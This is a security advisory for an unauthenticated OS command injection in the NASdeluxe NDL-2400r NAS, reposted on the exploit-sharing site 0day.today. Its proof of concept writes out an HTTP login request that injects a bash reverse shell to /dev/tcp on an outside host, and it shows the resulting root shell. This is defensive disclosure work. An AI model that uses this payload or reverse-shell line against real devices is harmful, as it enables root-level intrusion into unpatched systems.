0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NASdeluxe NDL-2400r 2.01.09 - OS Command Injection
Product: NASdeluxe NDL-2400r Vendor: Starline Computer GmbH Affected Version(s): 2.01.10 Tested Version(s): 2.01.09 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: no fix (product has reached EOL since 3 years) Vendor Notification: 2016-07-04 Public Disclosure: 2016-08-03 CVE Reference: Not assigned Author of Advisory: Klaus Eisentraut, SySS GmbH, https://www.syss.de/advisories/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection as root. No credentials are required to exploit this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details / Proof-of-Concept: The language parameter in the web interface login request of the product "NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root. The SySS GmbH sent the following HTTPS request to the webinterface: ~~~~~ POST /usr/usrgetform.html?name=index HTTP/1.1 Host: 192.168.1.1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen ~~~~~ After sending the request, a reverse shell connected back: ~~~~~ # nc -lvvp 443 Listening on any address 443 (https) Connection from 192.168.1.1:49070 bash: no job control in this shell bash-3.00# whoami root bash-3.00# cat /img/version 2.01.09 ~~~~~ The tested firmware version was 2.01.09. The most current version is 2.01.10 according to the web page of the vendor [3]. However there are no hints of a security update in the release notes [4]. Thus, the SySS GmbH assumes that this vulnerability is likely also present in the most current firmware version from 2009-10-22. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The product has reached end-of-life (EOL) status since more than three years. Thus, no patch will be provided by the vendor. It is highly recommended to migrate to one of the newer and still supported NAS solutions which are (according to Starline Computer GmbH) not affected by this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-06-29: Vulnerability discovered 2016-07-04: asked info@starline.de for contact person (no answer) 2016-07-22: sent this advisory to info@starline.de 2016-07-22: response from vendor: won't fix (product reached EOL >3 years) 2016-08-03: public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] SySS GmbH, SYSS-2016-065 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-065.txt [2] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [3] NASdeluxe Homepage https://www.nasdeluxe.com/ [4] NDL-2400R Firmware Release Notes https://www.nasdeluxe.com/wp-content/uploads/2008/12/NDL-2400R_NDL-2500T_FWRN_v2_01_10.171.pdf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Klaus Eisentraut of the SySS GmbH. E-Mail: klaus.eisentraut@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Klaus_Eisentraut.asc Key ID: 0xBAC677AE Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE # 0day.today [2024-12-24] #